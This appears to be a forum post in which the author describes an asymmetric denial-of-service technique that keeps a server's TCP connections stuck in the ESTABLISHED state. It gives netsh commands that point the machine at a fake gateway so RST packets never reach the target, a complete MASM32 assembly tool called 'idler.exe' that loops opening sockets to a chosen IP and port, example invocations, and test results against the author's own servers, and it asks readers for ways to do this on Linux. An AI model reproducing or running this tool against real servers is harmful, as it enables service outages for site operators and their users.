Some denial-of-service attacks can be executed with limited resources against a large, sophisticated site.
This type of attack is sometimes called an "asymmetric attack."
For example, an attacker with an old PC and a slow modem may be able to disable much faster and
more sophisticated machines or networks.
Last week I started to ponder what happens when servers don't handle their idle connection timeouts correctly.
A malicious client could attempt a DOS (denial of service) attack on the
those servers by opening connections and NEVER sending a reset packet.
I tried for days to prevent a [RST] packet getting sent to the target server.
I intentionally terminated idler.exe abnormally in the hopes the socket communication wouldn't cleanup
but everything I did failed.
But, one dull evening searching the web, I came across NETSH
which allowed me to programmatically define the default gateway on my NIC card.
Bingo! All I had to do was run this command:
netsh interface ip set address name="Wireless Network Connection" static 192.168.1.4 255.255.255.0 1.1.1.1 1
which would setup a fake gateway of 1.1.1.1, then close all my local sockets which generated the [RST] packets
but they couldn't notify the target server because the gateway was fake. Next, I'd reopen the gateway
netsh interface ip set address name="Wireless Network Connection" static 192.168.1.4 255.255.255.0 192.168.1.1 1
and then generate a 100 new open sockets and repeat the process.
This program stops any client-to-server http [RST, ACK] packets, which keeps the server sockets in an ESTABLISHED state.
C:\masm32>idler.exe "Local Area Connection" 192.168.1.3 255.255.255.0 192.168.1.1 74.134.251.2 8082 100
which opens 100 sockets to the target server 74.134.251.2 on port 8082, closes them locally, and repeats it over...
; Title: Idler - Generates many ESTABLISHED idle connections on the target IP address. ; ======================================= Let The Games Begin! ======================================= .486p .MODEL flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\ws2_32.inc include \masm32\include\masm32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\ws2_32.lib includelib \masm32\lib\masm32.lib Shell proto:DWORD,:DWORD .DATA Usage db 13,10,"Usage: idler.exe <",34,"Ethernet adapter",34,"> <Local IP Address> <Subnet Mask> <Default Gateway> <Target IP Address> <Port> <# of sockets>",13,10,13,10 db "Example: idler.exe ",34,"Wireless Network Connection",34," 192.168.1.4 255.255.255.0 192.168.1.1 205.188.153.121 80 100",13,10,13,10,0 ;C:\masm32>idler.exe "Local Area Connection 2" 192.168.1.3 255.255.255.0 192.168.1.1 74.134.251.2 8082 100 ; netsh interface ip set address name="Wireless Network Connection" static 192.168.1.4 255.255.255.0 192.168.1.1 1 ipconfig db "ipconfig.exe",0 retry_it db "Retrying to connect...",13,10,0 netsh db "netsh interface ip set address name=",0 static db " static ",0 space db " ",0 quote db '"',0 one db "1",0 target_ip db 16 dup(0) interface db 128 dup(0) ; Ethernet adapter ip db 16 dup(0) ; IP Address submask db 16 dup(0) ; Subnet Mask gateway db 16 dup(0) ; Default Gateway fake_gateway db '1.1.1.1',0 hSock dd 0 num db 6 dup(0) num_open_sockets dd 0 port dd ? SockAddress sockaddr_in <?> WSAData WSADATA <?> szEnable db 256 dup(0) szEnable_msg db "Enabling Gateway...",0 szDisable db 256 dup(0) szDisable_msg db "Disabling Gateway...",0 .CODE Main: invoke Shell,addr ipconfig,-1 invoke StdOut,addr Usage invoke GetCL,1,addr interface invoke GetCL,2,addr ip invoke GetCL,3,addr submask invoke GetCL,4,addr gateway invoke GetCL,5,addr target_ip invoke GetCL,6,addr num invoke atol,addr num mov port,eax invoke GetCL,7,addr num invoke atol,addr num mov num_open_sockets,eax invoke szMultiCat,12,addr szEnable, addr netsh, addr quote, addr interface, addr quote, addr static, addr ip, addr space, addr submask, addr space, addr gateway, addr space, addr one invoke szMultiCat,12,addr szDisable, addr netsh, addr quote, addr interface, addr quote, addr static, addr ip, addr space, addr submask, addr space, addr fake_gateway, addr space, addr one start: invoke StdOut,addr szEnable_msg invoke Shell,addr szEnable,-1 invoke WSAStartup,0101h,addr WSAData mov ecx,num_open_sockets dos: push ecx jmp here retry: invoke StdOut,addr retry_it invoke Sleep, 500;ms here: invoke socket,AF_INET,SOCK_STREAM,IPPROTO_IP mov hSock,eax mov SockAddress.sin_family, AF_INET invoke htons, port mov SockAddress.sin_port, ax invoke inet_addr, addr target_ip mov SockAddress.sin_addr, eax invoke connect,hSock,addr SockAddress,sizeof SockAddress test eax,eax jnz retry pop ecx loop dos invoke StdOut,addr szDisable_msg invoke Shell,addr szDisable,-1 invoke WSACleanup jmp start Shell PROC lpfilename:DWORD, dwTimeOut:DWORD LOCAL Sh_st_info :STARTUPINFO LOCAL Sh_pr_info :PROCESS_INFORMATION mov DWORD PTR [Sh_st_info.cb], SIZEOF STARTUPINFO invoke GetStartupInfoA, ADDR Sh_st_info mov DWORD PTR [Sh_st_info.lpReserved], 0 invoke CreateProcess, 0, [lpfilename], 0, 0, 0, 0, 0, 0, \ ADDR Sh_st_info, ADDR Sh_pr_info test eax, eax jz ERROR invoke WaitForSingleObject, [Sh_pr_info.hProcess], [dwTimeOut] push eax invoke CloseHandle, [Sh_pr_info.hThread] invoke CloseHandle, [Sh_pr_info.hProcess] pop eax test eax, eax RET ERROR: xor eax, eax sub eax, 1 RET Shell ENDP End Main
I ran this program against my win2k server and it really got bogged down with 3000 open connections
while the idler.exe program used about 3K of memory and never exceeded that.
I also tested this against my winXP IIS server which refused connections after just 10 established sockets.
I terminated the server stress test early as I'm not sure how my ISP would handle it or the consequences...
I'm sure under linux, one could play with IPtables or maybe create raw packets to intentionally not send [RST]'s.
But, under windows, I couldn't find anything but maybe you guys/gals could suggested a tool etc.,...?
Then again, all this is probably a waste of time...
Any ideas? Thanks!
